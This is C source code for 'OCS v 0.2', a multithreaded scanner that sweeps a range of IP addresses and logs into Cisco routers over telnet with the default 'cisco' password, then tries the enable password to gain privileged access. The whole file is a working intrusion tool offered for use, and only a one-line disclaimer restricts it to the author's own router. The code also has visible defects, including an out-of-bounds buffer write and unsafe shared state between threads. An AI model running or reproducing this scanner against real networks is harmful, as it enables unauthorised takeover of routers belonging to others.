Compact mass scanner for Cisco routers with default telnet/enable passwords.
867a0b5fd20fabea27f9b864ebcfd8aa4198e3378d494f86556283265b4301b0
/*
Author: OverIP
Andrea Piscopiello
overip at gmail.com
Source: OCS v 0.2
License: GPL
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
Email: Write me for any problem or suggestion at: overip at gmail.com
Date: 01/10/13
Read me: Just compile it with:
gcc ocs.c -o ocs -lpthread
Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
xxx.xxx.xxx.xxx=range start IP
yyy.yyy.yyy.yyy=range end IP
PAY ATTENTION: This source is coded for only personal use on
your own router Cisco. Don't hack around.
Special thanks to:
Khlero with your patience this code is out there :*
Shen139, without you I can't live :D
people that helped betatesting this code :)
Alex Kah and his Cisco Router :)
I love U all :*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
int i=0;
int j=0;
int k=0;
int l=0;
char buffer_a[700];
char buffer_b[700];
char buffer_c[700];
char tmpIP[16];
pthread_t threadname;
void callScan() // scanning
{
scanna(tmpIP);
pthread_exit(0);
}
static void funcAlarm() //alarm
{
pthread_exit(0);
}
int setnonblock(int sock) //setta socket non bloccanti
{
struct timeval timeout;
timeout.tv_sec = 10;
timeout.tv_usec = 0;
if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout)))
return 0;
return 1;
}
void init(struct sockaddr_in *address,int port,int IP)
{
address->sin_family=AF_INET;
address->sin_port=htons((u_short)port);
address->sin_addr.s_addr=IP;
}
int scanna(char*rangeIP) //scanning
{
int error;
int sd;
struct sockaddr_in server;
close(sd);
server.sin_family=AF_INET;
server.sin_port=htons(23);
server.sin_addr.s_addr=inet_addr(rangeIP);
sd=socket(AF_INET,SOCK_STREAM,0);
if(sd==-1)
{
printf("Socket Error(%s)\n",rangeIP);
close(sd);
pthread_exit(0);
}
// setnonblock(sd);
signal(SIGALRM,funcAlarm);
alarm(7);
fflush(stdout);
error=connect(sd,(struct sockaddr*)&server,sizeof(server));
if(error==0)
{
printf("\n\n-%s\n",rangeIP);
fflush(stdout);
memset(buffer_c, '\0',700);
recv(sd,buffer_c,700,0);
printf(" |Logging... %s\n",rangeIP);
fflush(stdout);
memset(buffer_a, '\0',700);
memset(buffer_b, '\0',700);
send(sd,"cisco\r",6,0);
sleep(1);
recv(sd,buffer_a,700,0);
if(strstr(buffer_a,"#"))
printf(" |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
else
if(strstr(buffer_a,">"))
{
printf(" |Default Telnet password found. %s\n",rangeIP);
fflush(stdout);
send(sd,"enable\r",7,0);
sleep(1);
send(sd,"cisco\r",6,0);
sleep(1);
recv(sd,buffer_b,700,0);
//printf(" Sto cercando di loggarmi in enable mode\n");
//fflush(stdout);
}
if(strstr(buffer_b,"#"))
printf(" |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
else
printf(" |Router not vulnerable. \n");
fflush(stdout);
}
else
{
printf("\n\n(%s) Filtered Ports\n",rangeIP);
close(sd);
alarm(0);
signal(SIGALRM,NULL);
pthread_exit(0);
}
close(sd);
fflush(stdout);
alarm(0);
signal(SIGALRM,NULL);
pthread_exit(0);
}
char *getByte(char *IP,int index);
int function1(char* IP, char* IP2)
{
char rangeIP[16];
pid_t pid;
i=atoi(getByte(IP,1));
j=atoi(getByte(IP,2));
k=atoi(getByte(IP,3));
l=atoi(getByte(IP,4));
while(1)
{
sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
strcpy(tmpIP,rangeIP);
if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
{
printf("+ Thread error:\n");
perror(" - pthread_create() ");
exit(0);
}
fflush(stdout);
pthread_join(threadname, NULL);
fflush(stdout);
l++;
if (l==256)
{
l=0;
k++;
if (k==256)
{
k=0;
j++;
if (j==256)
{
j=0;
i++;
}
}
}
if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4)))
{
break;
}
}
sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
strcpy(tmpIP,rangeIP);
fflush(stdout);
if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
{
printf("+ Thread error:\n");
perror(" - pthread_create() ");
exit(0);
}
pthread_join(threadname, NULL);
fflush(stdout);
}
int main(int argc,char *argv[])
{
int w;
printf("********************************* OCS v 0.2 **********************************\n");
printf("**** ****\n");
printf("**** coded by OverIP ****\n");
printf("**** overip at gmail.com ****\n");
printf("**** under GPL License ****\n");
printf("**** ****\n");
printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n");
printf("**** ****\n");
printf("**** xxx.xxx.xxx.xxx = range start IP ****\n");
printf("**** yyy.yyy.yyy.yyy = range end IP ****\n");
printf("**** ****\n");
printf("******************************************************************************\n");
if(argc!=3)
{
printf("use: %s IP IP\n",argv[0]);
exit(-1);
}
for(w=1;w<=5;w++)
if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255)
{
printf("use: ./OCS IP IP\n");
exit (-1);
}
for(w=1;w<=5;w++)
if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w)))
{
function1(argv[1],argv[2]);
return 0;
}
else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w)))
{
printf("use: %s IP IP\n",argv[0]);
return 0;
}
printf("Same IPs \n");
fflush(stdout);
scanna(argv[1]);
return 0;
}
char *getByte(char *IP,int index)
{
int i=0;
int separator=0;
static char byte[3];
for(i=0;i<4;i++)
byte[i]='\0';
memset(byte,0,sizeof(byte));
for(i=0;i<strlen(IP);i++)
{
if((IP[i]=='.') && (separator==index-1))
{
return byte;
}
else
if(IP[i]=='.')
{
separator++;
}
else
if (separator==index-1)
{
strncat(byte,&IP[i],1);
}
}
return byte;
}